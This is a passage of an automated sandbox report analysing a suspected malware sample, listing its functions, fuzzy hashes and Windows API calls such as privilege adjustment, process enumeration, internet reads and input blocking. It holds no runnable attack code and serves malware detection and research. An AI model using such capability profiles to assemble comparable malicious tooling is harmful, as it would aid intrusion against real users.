                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: 21acf796842af56f1520897c9849352478b57965552bd50b2041f6d35755e288
                                                      • Instruction ID: 2a982e8a77650571a1e83983fce1a75fa28f97f9334bdd7aa5a2be9a6c0d4248
                                                      • Opcode Fuzzy Hash: 21acf796842af56f1520897c9849352478b57965552bd50b2041f6d35755e288
                                                      • Instruction Fuzzy Hash: EAE08C70201703CFCB208B65D848A86B6D4FB08324BC0C83AE896CA220E770D881CB60
                                                      Function 00A73190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      • Opcode ID: 80ec4d9f733b4a5c4a9387b88426e025a7bb5bb76558f2344ccdf7a2406d129f
                                                      • Instruction ID: 148d59270f4103f0b98f4b314c4fbd8a44b2644682c37ef9044e07384c404513
                                                      • Opcode Fuzzy Hash: 80ec4d9f733b4a5c4a9387b88426e025a7bb5bb76558f2344ccdf7a2406d129f
                                                      • Instruction Fuzzy Hash: D1228D726083019FCB24DF24C991BAFB7F4AF85700F15891DF49A9B291DB71EA04CB92
                                                      Function 00ADF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00ADF151
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00ADF15F
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00ADF21F
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00ADF22E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: eab1ca0a3853b5691ba078718d52106228b65cb35a027d2845b242d7ab93faaa
                                                      • Instruction ID: 5b5530361ae7f0347f17815e5cbf09f71f4df3906bc7c5095d6e11fb4cb5dc07
                                                      • Opcode Fuzzy Hash: eab1ca0a3853b5691ba078718d52106228b65cb35a027d2845b242d7ab93faaa
                                                      • Instruction Fuzzy Hash: E0518C71504301AFD310EF20DC85E6BBBF8EF98750F54492DF596972A1EB70A908CB92
                                                      Function 00AC40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AC40D1
                                                      • _memset.LIBCMT ref: 00AC40F2
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AC4144
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AC414D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 75ad193a3e4e142ffea5760bf2e8397ea7cc946e32421548db18de4a139086a8
                                                      • Instruction ID: f98942b8d7625d7a1949de3c844262579dbf97add52283d8dc21691220334816
                                                      • Opcode Fuzzy Hash: 75ad193a3e4e142ffea5760bf2e8397ea7cc946e32421548db18de4a139086a8
                                                      • Instruction Fuzzy Hash: 2311AB759412287AD7309BA5AC4DFEBBB7CEF44760F10429AF908D7180D6744E808BA4
                                                      Function 00ABEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ABEB19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: a69232d8a82d7f8d76fd156f3c3a9b61866d915b0cfde6fd00fb138dfc90e9f4
                                                      • Instruction ID: 673130881462f61810b90b98484d86a3c699ba5284b27fd4d7a4302fd7601960
                                                      • Opcode Fuzzy Hash: a69232d8a82d7f8d76fd156f3c3a9b61866d915b0cfde6fd00fb138dfc90e9f4
                                                      • Instruction Fuzzy Hash: 13322775A007059FD728DF29C4819AAB7F5FF48310B15C56EE49ADB3A2E770E941CB40
                                                      Function 00AD25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00AD26D5
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AD270C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: 5aaa3c2aca7c98aab28b36a940ae4c56670f9e75267a1cb8a5cfdaefd1a30def
                                                      • Instruction ID: a516df8a197007e5a14617a13f1a91a6a9b243dc724091faaba5e114eee431ce
                                                      • Opcode Fuzzy Hash: 5aaa3c2aca7c98aab28b36a940ae4c56670f9e75267a1cb8a5cfdaefd1a30def
                                                      • Instruction Fuzzy Hash: 7C41AF75900309BFEB209B94DD85FBBB7BCEB50724F10406BFA02A6240EA71DE41D764
                                                      Function 00ACB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACB5AE
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ACB608
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ACB655
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: 1db196660a97ce0aa5f16463a50a7ff8137ed2b94de5f8fcff0406ffa9cfaa3f
                                                      • Instruction ID: 3b62dffa65983508eae29116df899876b222364449126a9151cf5e505a923991
                                                      • Opcode Fuzzy Hash: 1db196660a97ce0aa5f16463a50a7ff8137ed2b94de5f8fcff0406ffa9cfaa3f
                                                      • Instruction Fuzzy Hash: 21219035A00508EFCB00EFA5D880EEEBBB8FF48310F0480A9E905AB351DB319906CB50
                                                      Function 00AB8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                      • GetLastError.KERNEL32 ref: 00AB8D47
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: d048239ed8d5584f2bbf006dc1d14cbcbe83191a02344de4520b208d6f2108ec
                                                      • Instruction ID: 6b496fbe342bcbe00faa96db6a808520874e24c3b8ebbffb269fe3e12d3ddc49
                                                      • Opcode Fuzzy Hash: d048239ed8d5584f2bbf006dc1d14cbcbe83191a02344de4520b208d6f2108ec
                                                      • Instruction Fuzzy Hash: 39118FB1414209AFD728EF68DD85D6BB7BCFB44710B20852EF85697251EF30AD41CB60
                                                      Function 00AC4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AC4C2C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AC4C43
                                                      • FreeSid.ADVAPI32(?), ref: 00AC4C53
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 3712541478822efdde5f9f506f19518af1978b6c2cc9db76b2e306f4814fa706
                                                      • Instruction ID: e6f520870f430d413aeb4573586c40de1e1d1b650f4000bef22b17813d48131d
                                                      • Opcode Fuzzy Hash: 3712541478822efdde5f9f506f19518af1978b6c2cc9db76b2e306f4814fa706
                                                      • Instruction Fuzzy Hash: 46F04975A1130CBFDF04DFF0DC89AAEBBBCEF08211F0044A9A901E6181E6706A048B50
                                                      Function 00A6E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f7eeffd778820ce8db80c3e54b2dfe094b88e5c304e6c0573640de3a78b8fe7
                                                      • Instruction ID: e60890c2d9c58d13414d39ffda8d6939f8077b3c77e2bad942937fe90e0cf10c
                                                      • Opcode Fuzzy Hash: 6f7eeffd778820ce8db80c3e54b2dfe094b88e5c304e6c0573640de3a78b8fe7
                                                      • Instruction Fuzzy Hash: 8122CE79A00216CFCF24DF68C990AAEB7F1FF15300F148169E856AB391E731AD85CB91
                                                      Function 00ACC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ACC966
                                                      • FindClose.KERNEL32(00000000), ref: 00ACC996
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: ffbbc5ca7c5abd3d48a3dfcad40e91ba8c21afbf27c7f3a3273843412191dd1c
                                                      • Instruction ID: d987cc2d57c596f3d1697441c371f9e8c5dd7da031883e108c70d8ee197e6723
                                                      • Opcode Fuzzy Hash: ffbbc5ca7c5abd3d48a3dfcad40e91ba8c21afbf27c7f3a3273843412191dd1c
                                                      • Instruction Fuzzy Hash: BA11A5326002009FD710EF69C855A2AF7E9FF44320F04851EF8A9DB291DB34AC01CB81
                                                      Function 00ACA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AD977D,?,00AEFB84,?), ref: 00ACA302
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AD977D,?,00AEFB84,?), ref: 00ACA314
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 2d51e556ebbf853592463b71205758e3ecdb0c303f85e2f16dbf357753163d27
                                                      • Instruction ID: f86b6a986e694d0a47ff797aa2e7daee2ed90ec5e3542330d4fbc48ec59d28d3
                                                      • Opcode Fuzzy Hash: 2d51e556ebbf853592463b71205758e3ecdb0c303f85e2f16dbf357753163d27
                                                      • Instruction Fuzzy Hash: 66F0823564426DABDB109FA4CC48FEA776DFF08761F008169B918DA281D6309940CBA1
                                                      Function 00AB8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AB8851), ref: 00AB8728
                                                      • CloseHandle.KERNEL32(?,?,00AB8851), ref: 00AB873A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: c544a328ae82b0f257299308121652b31072398aaf1f4b867d69f03ee5f2a267
                                                      • Instruction ID: 86654547c3eb0ac69ee504cee1166183136f200a6042c09291bc3314333171b4
                                                      • Opcode Fuzzy Hash: c544a328ae82b0f257299308121652b31072398aaf1f4b867d69f03ee5f2a267
                                                      • Instruction Fuzzy Hash: D2E0B676010651EEE7252B64ED09D777BBDEB04354B248839B89684471DB62AC92DB10
                                                      Function 00A8A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A88F97,?,?,?,00000001), ref: 00A8A39A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A8A3A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: c0801b772f2f44d876de3de51d97c24f1d1e37858218520df7691adf42344cde
                                                      • Instruction ID: 3e534590bd00ed1a4c39d6335ab5684e8b0df4894f6a432c73cc497b478e2937
                                                      • Opcode Fuzzy Hash: c0801b772f2f44d876de3de51d97c24f1d1e37858218520df7691adf42344cde
                                                      • Instruction Fuzzy Hash: 65B0923105424AAFCA006BD1EC49B883F68EB44AA2F404020F61D8C464CB6255528B91
                                                      Function 00A8F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83b6d292bfeae0ae428f722652402b19b73b7186ecf05f020dc174a660df4be6
                                                      • Instruction ID: b0b3a826c2af212a89336de43b1383771b318e050b145af6a7922b8707f4a23c
                                                      • Opcode Fuzzy Hash: 83b6d292bfeae0ae428f722652402b19b73b7186ecf05f020dc174a660df4be6
                                                      • Instruction Fuzzy Hash: 31321671D69F024DD723A674D83233AA248AFB73D4F15D737E81AB59A6EB38C5834200
                                                      Function 00A9267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c3494ec685ed75e2a4390ca922fb1cea3d290be091628b6735b3e710c388e16
                                                      • Instruction ID: fd6f34218b53e36e04d506171f8eda737cdf308bddca379bdefa88437839483e
                                                      • Opcode Fuzzy Hash: 6c3494ec685ed75e2a4390ca922fb1cea3d290be091628b6735b3e710c388e16
                                                      • Instruction Fuzzy Hash: 96B12461E2AF414DD72396B98831336B79CAFBB2C5F51D71BFC1A74D22EB2185838241
                                                      Function 00AC8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __time64.LIBCMT ref: 00AC8B25
                                                        • Part of subcall function 00A8543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00AC91F8,00000000,?,?,?,?,00AC93A9,00000000,?), ref: 00A85443
                                                        • Part of subcall function 00A8543A: __aulldiv.LIBCMT ref: 00A85463
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: 810b3913a846764931275932627d7950e5e62bba14772d3bf8156700d42c0d57
                                                      • Instruction ID: 9441fb667dc9b867e864207ba075e7989ce4d877981fa42751a71d54b1fd5817
                                                      • Opcode Fuzzy Hash: 810b3913a846764931275932627d7950e5e62bba14772d3bf8156700d42c0d57
                                                      • Instruction Fuzzy Hash: 9D21AF726356108BC729CF29D841B52B3E1EFA5321B298E6CD0E9CB2D0CE74BD45CB94
                                                      Function 00AD41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00AD4218
                                                      Memory Dump Source
